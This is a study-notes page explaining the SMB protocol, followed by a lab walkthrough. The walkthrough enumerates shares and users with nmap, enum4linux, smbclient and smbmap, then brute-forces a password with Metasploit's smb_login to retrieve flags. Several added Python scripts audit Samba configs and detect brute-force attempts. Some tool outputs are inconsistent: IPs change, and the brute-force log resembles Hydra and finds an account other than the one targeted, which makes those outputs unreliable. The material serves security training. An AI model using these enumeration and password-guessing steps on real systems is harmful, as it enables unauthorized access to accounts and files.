SMB stands for Server Message Block, and it's a network protocol used for sharing files, printers, and other resources between computers on a network. It enables devices to communicate and collaborate by providing a way to access shared folders, files, and other resources on remote systems. SMB is primarily used in Windows environments, but it's also supported by various other operating systems.
Here are some key features and uses of the SMB protocol:
File and Printer Sharing: SMB allows computers to share files and printers over a network. Users can access remote files as if they were on their local machine and send print jobs to remote printers.
Access Control: SMB supports access control and authentication mechanisms, allowing administrators to set permissions for who can access shared resources and what level of access they have.
Named Pipes and Interprocess Communication: SMB provides named pipes for interprocess communication between programs running on different computers. This facilitates communication and data exchange between applications.
Network Browsing: SMB enables network browsing, allowing users to discover available computers, shared folders, and resources on the network.
Remote Procedure Calls (RPCs): SMB can be used for remote procedure calls, which enable a program to execute code on a remote server as if it were local.
Version History: SMB has gone through several versions, including SMB1, SMB2, and SMB3. Each version introduced improvements in terms of security, performance, and functionality.
Encryption and Security: Recent versions of SMB (SMB3) incorporate advanced security features such as encryption, signing, and improved authentication mechanisms to enhance the protection of data in transit.
Cross-Platform Support: While SMB is closely associated with Windows, it is supported on various platforms through different implementations. For example, Samba is an open-source implementation of the SMB/CIFS protocol that allows Unix-like systems to share resources with Windows systems.
CIFS: Common Internet File System (CIFS) is a more advanced version of SMB that provides additional features and better compatibility with modern network environments.
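The settings named above under Version History and Encryption and Security are the ones a defender checks on a Samba host (the cross-platform implementation mentioned under Cross-Platform Support). The following Python script is an added example, not part of this page or of the Samba project: it parses two constructed smb.conf fragments, one carrying weak settings (SMB1 still negotiable, signing disabled, null sessions and guest mapping permitted, a guest-writable share) and one hardened, and reports which settings would let anonymous enumeration succeed. The parameter names are real Samba parameters; the configs, the check list and the finding texts are this example's own.

```python
import re

# Constructed smb.conf fragments (not from the page): the first carries the
# settings an auditor would flag, the second the hardened equivalents.
WEAK_SMB_CONF = """
[global]
    workgroup = RECONLABS
    server min protocol = NT1          ; SMB1 still negotiable
    server signing = disabled
    map to guest = Bad User            ; unknown users become guest
    restrict anonymous = 0             ; null sessions allowed

[public]
    path = /srv/samba/public
    guest ok = yes
    writable = yes
"""

HARDENED_SMB_CONF = """
[global]
    workgroup = RECONLABS
    server min protocol = SMB3
    server signing = mandatory
    smb encrypt = required
    map to guest = Never
    restrict anonymous = 2

[public]
    path = /srv/samba/public
    guest ok = no
    writable = no
"""

# Samba accepts several spellings for some parameters; fold them to one key.
SYNONYMS = {"server smb encrypt": "smb encrypt", "writeable": "writable"}
YES = ("yes", "true", "1")


def parse_smb_conf(text):
    """Parse smb.conf text into {section: {parameter: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()  # drop comments
        if not line:
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1).strip().lower()
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        key = " ".join(key.lower().split())
        sections[current][SYNONYMS.get(key, key)] = value.strip()
    return sections


# (parameter, predicate that is True when the value is weak, finding text)
GLOBAL_CHECKS = [
    ("server min protocol",
     lambda v: v.upper() in ("CORE", "COREPLUS", "LANMAN1", "LANMAN2", "NT1"),
     "SMB1 dialects accepted; raise 'server min protocol' to SMB2_02 or SMB3"),
    ("server signing", lambda v: v.lower() not in ("mandatory", "required"),
     "signing not enforced; set 'server signing = mandatory'"),
    ("smb encrypt", lambda v: v.lower() in ("off", "disabled"),
     "encryption switched off; set 'smb encrypt = required'"),
    ("map to guest", lambda v: v.lower() != "never",
     "failed logons are mapped to guest; set 'map to guest = Never'"),
    ("restrict anonymous", lambda v: v == "0",
     "null sessions permitted; set 'restrict anonymous = 2'"),
]


def audit_smb_conf(text):
    """Return a list of (section, finding) tuples for weak settings."""
    conf = parse_smb_conf(text)
    findings = []
    glob = conf.get("global", {})
    for key, is_weak, message in GLOBAL_CHECKS:
        if key in glob and is_weak(glob[key]):
            findings.append(("global", message))
    if "smb encrypt" not in glob:
        findings.append(("global", "encryption not configured; set 'smb encrypt = required'"))
    for section, params in conf.items():
        if section == "global":
            continue
        if params.get("guest ok", "no").lower() in YES:
            # 'writable = yes' and 'read only = no' mean the same thing in Samba
            writable = (params.get("writable", "no").lower() in YES
                        or params.get("read only", "yes").lower() not in YES)
            kind = "guest-writable share" if writable else "guest-readable share"
            findings.append((section, kind + " ('guest ok = yes')"))
    return findings


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_SMB_CONF), ("hardened", HARDENED_SMB_CONF)):
        print(f"{label}: {len(audit_smb_conf(conf))} finding(s)")
        for section, finding in audit_smb_conf(conf):
            print(f"  [{section}] {finding}")
```

Run against a real smb.conf by reading the file into `audit_smb_conf`; a parameter that is absent is not flagged (except `smb encrypt`), because Samba's defaults for absent keys differ between releases and roles, so the hardened fragment sets every relevant key explicitly.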
SMB Enumeration
SMB enumeration refers to the process of extracting information and details from a target system that is running the Server Message Block (SMB) protocol. SMB is a network file sharing protocol that enables applications and systems to communicate and share resources such as files, printers, and other devices across a network. SMB is commonly used in Windows environments for sharing files and resources.
During SMB enumeration, a penetration tester or security analyst attempts to retrieve valuable information from the target system by querying the SMB services. This process involves querying various aspects of the system, including:
Shares: Enumerating the shared folders and resources on the target system, which can reveal information about directory structures, file names, and access permissions.
Users and Groups: Extracting information about users and groups present on the system. This information can help identify potential user accounts for further exploitation.
Services: Identifying active services, applications, and processes running on the target system, which could potentially lead to vulnerabilities or weaknesses.
Session Information: Gathering details about active user sessions and connections to the target system.
System Information: Extracting information about the target system's operating system, version, and other configuration details.
Security Policies: Obtaining information about security policies, such as password policies, that could impact the strength of user credentials.
Error Messages: Analyzing error messages or responses from the SMB service, which might provide insights into potential misconfigurations or vulnerabilities.
SMB Ports
TCP Port 445 - Microsoft-DS (Microsoft Directory Services): This is the main port used for SMB traffic on modern networks. It is commonly used for file and printer sharing, as well as other SMB-related operations.
UDP Port 137 - NetBIOS Name Service: This port is used for the NetBIOS Name Resolution service. NetBIOS (Network Basic Input/Output System) is a service that allows computers to communicate within a local network. This port is involved in resolving NetBIOS names to IP addresses.
UDP Port 138 - NetBIOS Datagram Service: This port is used for the NetBIOS Datagram Service. It is involved in the communication of datagrams between devices on the network.
TCP Port 139 - NetBIOS Session Service: In the past, this port was widely used for SMB traffic, but it has become less common in modern networks. It was used for file access operations and resource sharing.
SMB: Windows Discover & Mount
Task List
A Windows machine (Server 2012) is provided to you.
Learn to use Nmap to scan the target machine and mount the SMB share of the target machine using the Windows File Explorer as well as using the command prompt.
Objective: Discover SMB share and mount it
The following username and password may be used to access the service:
Numerous iterations of the SMB protocol exist, including SMBv1, CIFS, SMBv2, SMBv2.1, SMBv3, and others.
For instance, Windows employs SMB for mapping and sharing drives as letters.
Typically, SMB is detectable on ports 139 or 445; nmap service and script enumeration (-sV, -sC) can reveal additional details such as the operating system version.
Once SMB is identified during port scanning, use nmap to gather further information.
# nmap logged in as the "guest" account
Host script results:
| smb-enum-sessions:
|   Users logged in
|_    WIN-OMCNBKR66MN\bob since <unknown>
# bob is logged in without any credentials, since the "guest login" is enabled
Use the provided user and password to enumerate the same login sessions
Use the Metasploit Framework's msfconsole interface to enumerate the Samba version.
msfconsole
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.28.157.45
RHOSTS => 192.28.157.45
exploit
[*] 192.28.157.45:445 - Host could not be identified: Windows 6.1 (Samba 4.3.11-Ubuntu)
[*] 192.28.157.45:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
nmblookup
nmblookup - NetBIOS over TCP/IP client used to lookup NetBIOS names
nmblookup -A 192.28.157.45
Looking up status of 192.28.157.45
SAMBA-RECON <00> - H <ACTIVE>
SAMBA-RECON <03> - H <ACTIVE>
SAMBA-RECON <20> - H <ACTIVE>
..__MSBROWSE__. <01> - <GROUP> H <ACTIVE>
RECONLABS <00> - <GROUP> H <ACTIVE>
RECONLABS <1d> - H <ACTIVE>
RECONLABS <1e> - <GROUP> H <ACTIVE>
MAC Address = 00-00-00-00-00-00
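The node status table above is worth reading line by line: the two-digit suffix after each name says which NetBIOS service registered it, so <20> on SAMBA-RECON means the host offers file shares, <1d> on RECONLABS means it is the subnet's master browser, and the <GROUP> entries name the workgroup. The parser below is an added example (not from the page or from Samba) that turns nmblookup -A output into structured records using the standard NetBIOS suffix meanings; the sample text is the page's own output with its column spacing restored.

```python
import re

# Node status output copied from this page's nmblookup -A run; the column
# spacing is restored here, the values are the page's own.
NODE_STATUS = """Looking up status of 192.28.157.45
        SAMBA-RECON     <00> -         H <ACTIVE>
        SAMBA-RECON     <03> -         H <ACTIVE>
        SAMBA-RECON     <20> -         H <ACTIVE>
        ..__MSBROWSE__. <01> - <GROUP> H <ACTIVE>
        RECONLABS       <00> - <GROUP> H <ACTIVE>
        RECONLABS       <1d> -         H <ACTIVE>
        RECONLABS       <1e> - <GROUP> H <ACTIVE>

        MAC Address = 00-00-00-00-00-00
"""

# Standard NetBIOS name suffixes (the 16th byte of the name), keyed by
# (suffix, registered-as-group).
SUFFIX_MEANING = {
    ("00", False): "Workstation Service (host name)",
    ("00", True): "Domain or workgroup name",
    ("03", False): "Messenger Service",
    ("20", False): "File Server Service (SMB shares offered)",
    ("1b", False): "Domain Master Browser",
    ("1d", False): "Master Browser for this subnet",
    ("1e", True): "Browser Service Elections",
    ("01", True): "Master Browser (__MSBROWSE__)",
}

# Node type letter: how the host resolves NetBIOS names.
NODE_TYPES = {"B": "broadcast", "P": "point-to-point", "M": "mixed", "H": "hybrid"}

LINE_RE = re.compile(
    r"^\s*(?P<name>\S+)\s+<(?P<suffix>[0-9a-fA-F]{2})>\s+-\s+"
    r"(?P<group><GROUP>)?\s*(?P<node>[BPMH])\s+<(?P<state>\w+)>"
)


def parse_node_status(text):
    """Return (records, mac): one dict per registered name plus the MAC line."""
    records, mac = [], None
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            suffix = m.group("suffix").lower()
            is_group = m.group("group") is not None
            records.append({
                "name": m.group("name"),
                "suffix": suffix,
                "group": is_group,
                "node_type": NODE_TYPES[m.group("node")],
                "state": m.group("state"),
                "meaning": SUFFIX_MEANING.get((suffix, is_group), "unknown suffix"),
            })
        elif line.strip().startswith("MAC Address"):
            mac = line.split("=", 1)[1].strip()
    return records, mac


def summarize(text):
    """Pull out the facts an assessor cares about: host, workgroup, roles."""
    records, mac = parse_node_status(text)
    host = next((r["name"] for r in records if r["suffix"] == "00" and not r["group"]), None)
    workgroup = next((r["name"] for r in records if r["suffix"] == "00" and r["group"]), None)
    return {
        "host": host,
        "workgroup": workgroup,
        "file_server": any(r["suffix"] == "20" and not r["group"] for r in records),
        "master_browser": any(r["suffix"] == "1d" and not r["group"] for r in records),
        "mac": mac,
    }


if __name__ == "__main__":
    for rec in parse_node_status(NODE_STATUS)[0]:
        print(f"{rec['name']:<16} <{rec['suffix']}> {'group' if rec['group'] else 'unique':<7} {rec['meaning']}")
    print(summarize(NODE_STATUS))
```

The all-zero MAC address is characteristic of Samba's nmbd, which does not report a hardware address, so that line alone is a hint that the responder is Samba rather than a Windows host.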
smbclient - ftp-like client to access SMB/CIFS resources on servers
smbclient -L 192.28.157.45 -N
# -L = list available services
# -N = no password prompt
Sharename Type Comment
--------- ---- -------
public Disk
john Disk
aisha Disk
emma Disk
everyone Disk
IPC$ IPC IPC Service (samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
RECONLABS SAMBA-RECON
enum4linux - tool for enumerating data from Windows and Samba hosts
enum4linux -o 192.230.128.82
==========================
| Target Information |
==========================
Target ........... 192.230.128.82
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 192.230.128.82 |
=====================================================
[+] Got domain/workgroup name: RECONLABS
======================================
| Session Check on 192.230.128.82 |
======================================
[+] Server 192.230.128.3 allows sessions using username '', password ''
============================================
| Getting domain SID for 192.230.128.82 |
============================================
Domain Name: RECONLABS
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=======================================
| OS information on 192.230.128.82 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.230.128.82 from smbclient:
[+] Got OS info for 192.230.128.82 from srvinfo:
SAMBA-RECON Wk Sv PrQ Unx NT SNT samba.recon.lab
platform_id : 500
os version : 6.1
server type : 0x809a03
Find samba server description
smbclient -L 192.230.128.82 -N
Sharename Type Comment
--------- ---- -------
public Disk
john Disk
aisha Disk
emma Disk
everyone Disk
IPC$ IPC IPC Service (samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
RECONLABS SAMBA-RECON
Host script results:
| smb-enum-users:
| SAMBA-RECON\admin (RID: 1005)
| Full name:
| Description:
| Flags: Normal user account
| SAMBA-RECON\aisha (RID: 1004)
| Full name:
| Description:
| Flags: Normal user account
| SAMBA-RECON\elie (RID: 1002)
| Full name:
| Description:
| Flags: Normal user account
| SAMBA-RECON\emma (RID: 1003)
| Full name:
| Description:
| Flags: Normal user account
| SAMBA-RECON\john (RID: 1000)
| Full name:
| Description:
| Flags: Normal user account
| SAMBA-RECON\shawn (RID: 1001)
| Full name:
| Description:
|_ Flags: Normal user account
enum4linux -U 192.230.128.82
==========================
| Target Information |
==========================
Target ........... 192.230.128.82
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=====================================================
| Enumerating Workgroup/Domain on 192.230.128.82 |
=====================================================
[+] Got domain/workgroup name: RECONLABS
======================================
| Session Check on 192.230.128.82 |
======================================
[+] Server 192.230.128.82 allows sessions using username '', password ''
============================================
| Getting domain SID for 192.230.128.82 |
============================================
Domain Name: RECONLABS
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==============================
| Users on 192.230.128.82 |
==============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: john Name: Desc:
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elie Name: Desc:
index: 0x3 RID: 0x3ec acb: 0x00000010 Account: aisha Name: Desc:
index: 0x4 RID: 0x3e9 acb: 0x00000010 Account: shawn Name: Desc:
index: 0x5 RID: 0x3eb acb: 0x00000010 Account: emma Name: Desc:
index: 0x6 RID: 0x3ed acb: 0x00000010 Account: admin Name: Desc:
user:[john] rid:[0x3e8]
user:[elie] rid:[0x3ea]
user:[aisha] rid:[0x3ec]
user:[shawn] rid:[0x3e9]
user:[emma] rid:[0x3eb]
user:[admin] rid:[0x3ed]
=========================================
| Share Enumeration on 192.187.39.6 |
=========================================
Sharename Type Comment
--------- ---- -------
public Disk
john Disk
aisha Disk
emma Disk
everyone Disk
IPC$ IPC IPC Service (samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
RECONLABS SAMBA-RECON
[+] Attempting to map shares on 192.187.39.6
//192.187.39.3/public Mapping: OK, Listing: OK
//192.187.39.3/john Mapping: DENIED, Listing: N/A
//192.187.39.3/aisha Mapping: DENIED, Listing: N/A
//192.187.39.3/emma Mapping: DENIED, Listing: N/A
//192.187.39.3/everyone Mapping: DENIED, Listing: N/A
//192.187.39.3/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
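The nmap smb-enum-users block and the enum4linux -U listing above describe the same accounts: enum4linux prints RIDs in hex (0x3e8) where nmap prints decimal (1000), and enum4linux also prints the acb (account control bits) field, which nmap summarises as "Normal user account". The script below is an added example, not from either tool: it parses both formats, normalises the RIDs, decodes the acb bits using the SAMR USER_ACCOUNT flag values, and flags what an auditor would follow up on (password not required, non-expiring password, a well-known RID such as 500 under a renamed account). The page's six users are used verbatim; the seventh row (svc_backup) is constructed to exercise the checks.

```python
import re

# enum4linux -U rows as shown on this page, plus one constructed extra row
# (svc_backup, RID 0x1f4 = 500, acb 0x214) to exercise the audit checks.
ENUM4LINUX_USERS = """
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: john Name: Desc:
index: 0x2 RID: 0x3ea acb: 0x00000010 Account: elie Name: Desc:
index: 0x3 RID: 0x3ec acb: 0x00000010 Account: aisha Name: Desc:
index: 0x4 RID: 0x3e9 acb: 0x00000010 Account: shawn Name: Desc:
index: 0x5 RID: 0x3eb acb: 0x00000010 Account: emma Name: Desc:
index: 0x6 RID: 0x3ed acb: 0x00000010 Account: admin Name: Desc:
index: 0x7 RID: 0x1f4 acb: 0x00000214 Account: svc_backup Name: Desc:
"""

# The nmap smb-enum-users block from this page (name lines only; the
# Full name / Description / Flags lines carry nothing for these accounts).
NMAP_USERS = r"""
| smb-enum-users:
|   SAMBA-RECON\admin (RID: 1005)
|   SAMBA-RECON\aisha (RID: 1004)
|   SAMBA-RECON\elie (RID: 1002)
|   SAMBA-RECON\emma (RID: 1003)
|   SAMBA-RECON\john (RID: 1000)
|_  SAMBA-RECON\shawn (RID: 1001)
"""

# SAMR USER_ACCOUNT flag bits (MS-SAMR), the meaning of the acb value.
ACB_FLAGS = {
    0x0001: "DISABLED",
    0x0002: "HOMEDIR_REQUIRED",
    0x0004: "PASSWORD_NOT_REQUIRED",
    0x0008: "TEMP_DUPLICATE",
    0x0010: "NORMAL_ACCOUNT",
    0x0020: "MNS_LOGON",
    0x0040: "INTERDOMAIN_TRUST",
    0x0080: "WORKSTATION_TRUST",
    0x0100: "SERVER_TRUST",
    0x0200: "DONT_EXPIRE_PASSWORD",
    0x0400: "AUTO_LOCKED",
}
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt", 512: "Domain Admins"}

E4L_RE = re.compile(r"RID:\s*0x(?P<rid>[0-9a-fA-F]+)\s+acb:\s*0x(?P<acb>[0-9a-fA-F]+)\s+Account:\s*(?P<name>\S+)")
NMAP_RE = re.compile(r"\\(?P<name>[^\s\\]+)\s+\(RID:\s*(?P<rid>\d+)\)")


def parse_enum4linux_users(text):
    """{name: {'rid': int, 'acb': int}} from enum4linux -U / rpcclient querydispinfo rows."""
    return {m.group("name"): {"rid": int(m.group("rid"), 16), "acb": int(m.group("acb"), 16)}
            for m in E4L_RE.finditer(text)}


def parse_nmap_users(text):
    """{name: rid} from an nmap smb-enum-users script block."""
    return {m.group("name"): int(m.group("rid")) for m in NMAP_RE.finditer(text)}


def decode_acb(acb):
    """Names of the set account-control bits, lowest bit first."""
    return [label for bit, label in ACB_FLAGS.items() if acb & bit]


def audit_users(e4l_text, nmap_text):
    """Cross-check both tools and list the accounts worth a closer look."""
    e4l, nmap = parse_enum4linux_users(e4l_text), parse_nmap_users(nmap_text)
    findings = []
    for name, info in e4l.items():
        flags = decode_acb(info["acb"])
        if "PASSWORD_NOT_REQUIRED" in flags:
            findings.append(f"{name}: password not required")
        if "DONT_EXPIRE_PASSWORD" in flags:
            findings.append(f"{name}: password never expires")
        known = WELL_KNOWN_RIDS.get(info["rid"])
        if known and name.lower() != known.lower():
            findings.append(f"{name}: well-known RID {info['rid']} ({known}) under a different name")
    for name, rid in nmap.items():
        if name in e4l and e4l[name]["rid"] != rid:
            findings.append(f"{name}: RID mismatch between tools ({e4l[name]['rid']} vs {rid})")
    return {
        "findings": findings,
        "only_enum4linux": sorted(set(e4l) - set(nmap)),
        "only_nmap": sorted(set(nmap) - set(e4l)),
    }


if __name__ == "__main__":
    for line in audit_users(ENUM4LINUX_USERS, NMAP_USERS)["findings"]:
        print(line)
```

On the page's own data the two tools agree on every RID, so the only output comes from the constructed row; on a real assessment a RID mismatch or an account that one tool sees and the other does not is itself worth a note, since it usually means one query ran with different rights or a different RID range.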
smbclient -L 192.187.39.6 -N
Sharename Type Comment
--------- ---- -------
public Disk
john Disk
aisha Disk
emma Disk
everyone Disk
IPC$ IPC IPC Service (samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
RECONLABS SAMBA-RECON
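The two outputs above answer different questions: smbclient -L with -N lists what the server advertises, while the enum4linux mapping lines show what a null session can actually connect to and list. The script below is an added example, not from either tool, that parses both (the page's own output is embedded as the sample) and joins them into one report, so anonymously readable shares such as public stand out from the merely advertised ones. That the listing works at all without credentials is itself a finding on the server side.

```python
import re

# smbclient -L output copied from this page, with its column layout restored.
SMBCLIENT_LIST = """
    Sharename       Type      Comment
    ---------       ----      -------
    public          Disk
    john            Disk
    aisha           Disk
    emma            Disk
    everyone        Disk
    IPC$            IPC       IPC Service (samba.recon.lab)
Reconnecting with SMB1 for workgroup listing.

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    RECONLABS            SAMBA-RECON
"""

# enum4linux share-mapping lines copied from this page (host as printed there).
MAPPING_OUTPUT = r"""
[+] Attempting to map shares on 192.187.39.6
//192.187.39.3/public    Mapping: OK, Listing: OK
//192.187.39.3/john      Mapping: DENIED, Listing: N/A
//192.187.39.3/aisha     Mapping: DENIED, Listing: N/A
//192.187.39.3/emma      Mapping: DENIED, Listing: N/A
//192.187.39.3/everyone  Mapping: DENIED, Listing: N/A
//192.187.39.3/IPC$      [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
"""

SHARE_RE = re.compile(r"^\s*(?P<name>\S+)\s+(?P<type>Disk|IPC|Printer|Device)\b\s*(?P<comment>.*?)\s*$")
MAP_RE = re.compile(r"^//[^/]+/(?P<share>\S+)\s+Mapping:\s*(?P<mapping>\w+),\s*Listing:\s*(?P<listing>\S+)")
ERR_RE = re.compile(r"^//[^/]+/(?P<share>\S+)\s+\[E\]")


def parse_smbclient_list(text):
    """[{'name', 'type', 'comment'}] from the share table of an smbclient -L listing."""
    shares = []
    for line in text.splitlines():
        if line.strip().startswith("Reconnecting"):
            break  # the server/workgroup tables that follow are not shares
        m = SHARE_RE.match(line)
        if m:
            shares.append({"name": m.group("name"), "type": m.group("type"),
                           "comment": m.group("comment")})
    return shares


def parse_mapping(text):
    """{share: {'mapping': 'OK'|'DENIED'|'ERROR', 'listing': 'OK'|'N/A'}}."""
    access = {}
    for line in text.splitlines():
        m = MAP_RE.match(line)
        if m:
            access[m.group("share")] = {"mapping": m.group("mapping"), "listing": m.group("listing")}
            continue
        e = ERR_RE.match(line)
        if e:
            access[e.group("share")] = {"mapping": "ERROR", "listing": "N/A"}
    return access


def audit_null_session(list_text, mapping_text):
    """Every advertised share with the access a null session got to it."""
    access = parse_mapping(mapping_text)
    report = []
    for share in parse_smbclient_list(list_text):
        a = access.get(share["name"], {"mapping": "UNTESTED", "listing": "N/A"})
        report.append({
            "name": share["name"],
            "type": share["type"],
            "comment": share["comment"],
            "anonymous_mapping": a["mapping"] == "OK",
            "anonymous_listing": a["listing"] == "OK",
            "status": a["mapping"],
        })
    return report


def exposed_shares(report):
    """Names of shares a null session could both connect to and list."""
    return [r["name"] for r in report if r["anonymous_mapping"] and r["anonymous_listing"]]


if __name__ == "__main__":
    rep = audit_null_session(SMBCLIENT_LIST, MAPPING_OUTPUT)
    for r in rep:
        print(f"{r['name']:<10} {r['type']:<5} {r['status']:<8} {r['comment']}")
    print("anonymously readable:", exposed_shares(rep))
```

The IPC$ error line is normal: IPC$ is the named-pipe endpoint rather than a directory tree, so attempting a directory listing on it yields NT_STATUS_OBJECT_NAME_NOT_FOUND; the report keeps it as ERROR rather than treating it as a denied share.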
Find domain groups on the samba server
enum4linux -G 192.187.39.6
==============================
| Groups on 192.187.39.6 |
==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
group:[Testing] rid:[0x3f0]
[+] Getting local group memberships:
[+] Getting domain groups:
group:[Maintainer] rid:[0x3ee]
group:[Reserved] rid:[0x3ef]
[+] Getting domain group memberships:
enum4linux complete on Tue Feb 14 22:13:33 2023
📌 Available domain groups are Maintainer, Reserved
Check if samba server is configured for printing
enum4linux -i 192.187.39.6
=============================================
| Getting printer info for 192.187.39.6 |
=============================================
No printers returned.
📌 No printers returned.
smbclient //192.187.39.6/public -N
smb: \> ls  # ls command
. D 0 Tue Feb 14 21:58:47 2023
.. D 0 Tue Nov 27 13:36:13 2018
secret D 0 Tue Nov 27 13:36:13 2018
dev D 0 Tue Nov 27 13:36:13 2018
📌 There are 2 directories present inside public share: secret and dev
smb: \> cd secret
smb: \secret\> ls
. D 0 Tue Nov 27 13:36:13 2018
.. D 0 Tue Feb 14 21:58:47 2023
flag N 33 Tue Nov 27 13:36:13 2018
1981084628 blocks of size 1024. 39614508 blocks available
smb: \secret\> get flag
getting file \secret\flag of size 33 as flag (32.2 KiloBytes/sec) (average 32.2 KiloBytes/sec)
smb: \secret\> exit
root@attackdefense:~# cat flag
Word lists are lists of already known and used passwords, some of them leaked from breached websites or other services. Those passwords can be used as part of the attack via brute force tools.
In Kali Linux wordlists can be found inside /usr/share/wordlists directory.
gzip -d /usr/share/wordlists/rockyou.txt.gz
# Unzip rockyou.txt list
ip -br -c a
eth1@if108489 UP 192.174.58.5/24
Target IP is 192.174.58.6
nmap 192.174.58.6
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Use the smb_login Metasploit module to brute-force jane's password
msfconsole
use auxiliary/scanner/smb/smb_login
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
set SMBUser jane
set RHOSTS 192.174.58.6
exploit
[DATA] max 1 task per 1 server, overall 1 task, 14344399 login tries (l:1/p:14344399), ~14344399 tries per task
[DATA] attacking smb://192.174.58.6:445/
[445][smb] host: 192.174.58.6 login: admin password: password1
1 of 1 target successfully completed, 1 valid password found
📌 admin's password is password1
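A run like the one above is noisy by design: the output reports 14344399 login attempts against one host, so on the server side it appears as a burst of failed network logons from a single source, followed by one success once the password matches. The script below is an added example (not from Metasploit or the lab) of the detection logic that catches it: it keeps a sliding 60-second window of failed logons per source address over constructed records modelled loosely on Windows Security events 4625 and 4624 with logon type 3, raises one alert when the count reaches a threshold, and a second when a success arrives from a source still inside such a burst. The record format, the threshold and the sample data are this example's own.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

THRESHOLD = 10       # failures from one source inside the window (constructed value)
WINDOW_SECONDS = 60

# One record per line, constructed for this example and modelled loosely on
# Windows Security events 4625 (failed logon) and 4624 (successful logon) with
# logon type 3 (network), which is what SMB authentication produces.
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"
REC_RE = re.compile(
    r"^(?P<ts>\S+)\s+EventID=(?P<eid>\d+)\s+LogonType=(?P<lt>\d+)\s+"
    r"Src=(?P<src>\S+)\s+User=(?P<user>\S+)"
)


def build_sample_log():
    """Constructed sample: a 24-attempt burst, the success that ends it, one stray failure."""
    base = datetime(2023, 2, 14, 22, 10, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(24):
        ts = (base + timedelta(seconds=i // 4)).strftime(TS_FMT)
        user = ("jane", "admin")[i % 2]
        lines.append(f"{ts} EventID=4625 LogonType=3 Src=192.174.58.5 User={user} Status=0xC000006D")
    ts = (base + timedelta(seconds=6)).strftime(TS_FMT)
    lines.append(f"{ts} EventID=4624 LogonType=3 Src=192.174.58.5 User=admin Status=0x0")
    lines.append("2023-02-14T22:30:00Z EventID=4625 LogonType=3 Src=192.174.58.9 User=nancy Status=0xC000006D")
    return lines


def detect_smb_bruteforce(lines, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Sliding-window count of network-logon failures per source address."""
    recent = defaultdict(deque)      # src -> timestamps of failures still inside the window
    users_tried = defaultdict(set)   # src -> account names seen in those failures
    alerted = set()                  # sources already reported, to avoid one alert per attempt
    alerts = []
    for line in lines:
        m = REC_RE.match(line)
        if not m or m.group("lt") != "3":
            continue  # only network logons matter for SMB
        ts = datetime.strptime(m.group("ts"), TS_FMT).replace(tzinfo=timezone.utc)
        src, user, eid = m.group("src"), m.group("user"), m.group("eid")
        q = recent[src]
        while q and (ts - q[0]).total_seconds() > window:
            q.popleft()  # expire failures older than the window
        if eid == "4625":
            q.append(ts)
            users_tried[src].add(user)
            if len(q) >= threshold and src not in alerted:
                alerted.add(src)
                alerts.append({"type": "smb_bruteforce", "src": src, "failures": len(q),
                               "users": sorted(users_tried[src]), "at": ts.strftime(TS_FMT)})
        elif eid == "4624" and len(q) >= threshold:
            # a success from a source that is still inside a failure burst is
            # the signal that the guessing worked
            alerts.append({"type": "success_after_bruteforce", "src": src, "user": user,
                           "failures_before": len(q), "at": ts.strftime(TS_FMT)})
    return alerts


if __name__ == "__main__":
    for alert in detect_smb_bruteforce(build_sample_log()):
        print(alert)
```

The per-source window also captures spraying, where one source tries a few passwords against many accounts: the `users` list in the first alert shows how many distinct names were involved, which a per-account lockout policy alone would not reveal.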
Find smb shares using found credentials
smbmap -u admin -p password1 -H 192.174.58.6
[+] Finding open SMB ports....
[+] User SMB session establishd on 192.174.58.6...
[+] IP: 192.174.58.6:445 Name: target-1
Disk Permissions
---- -----------
shawn READ, WRITE
nancy READ ONLY
admin READ, WRITE
IPC$ NO ACCESS
📌 Read-only share is nancy
smbclient -L 192.28.157.6 -U jane
# Use "abc123" password
smbclient //192.174.58.6/jane -U jane
smb: \> ls
. D 0 Tue Nov 27 19:25:12 2018
.. D 0 Tue Nov 27 19:25:12 2018
admin D 0 Tue Nov 27 19:25:12 2018
logs D 0 Tue Nov 27 19:25:12 2018
flag D 0 Tue Nov 27 19:25:12 2018
1981084628 blocks of size 1024. 48016456 blocks available
smb: \> pwd
Current directory is \\192.174.58.6\jane\
📌 jane's share is not browsable but it exists.
smbclient //192.174.58.6/admin -U admin
# Use "password1" password
smb: \> ls
smb: \> cd hidden
smb: \hidden\> ls
smb: \hidden\> get flag.tar.gz
smb: \hidden\> exit
